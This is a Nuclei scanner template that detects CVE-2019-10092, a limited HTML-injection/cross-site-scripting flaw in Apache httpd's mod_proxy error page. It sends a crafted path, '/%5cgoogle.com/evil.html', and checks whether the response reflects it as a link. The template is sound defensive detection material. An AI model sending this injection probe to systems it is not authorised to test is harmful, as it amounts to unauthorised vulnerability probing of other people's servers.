nuclei-templates/cves/2019/CVE-2019-10092.yaml

30 lines
1.3 KiB
YAML

id: CVE-2019-10092
info:
name: Apache HTTP Server <=2.4.39 - HTML Injection/Partial Cross-Site Scripting
author: pdteam
severity: medium
description: Apache HTTP Server versions 2.4.0 through 2.4.39 are vulnerable to a limited cross-site scripting issue affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed.
reference:
- https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2019-10092-Limited%20Cross-Site%20Scripting%20in%20mod_proxy%20Error%20Page-Apache%20httpd
- https://httpd.apache.org/security/vulnerabilities_24.html
- https://lists.debian.org/debian-lts-announce/2019/09/msg00034.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-10092
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-10092
cwe-id: CWE-79
tags: cve,cve2019,apache,htmli,injection
requests:
- method: GET
path:
- '{{BaseURL}}/%5cgoogle.com/evil.html'
matchers:
- type: word
words:
- "<a href=\"/\\google.com/evil.html\">"
# Enhanced by mp on 2022/08/11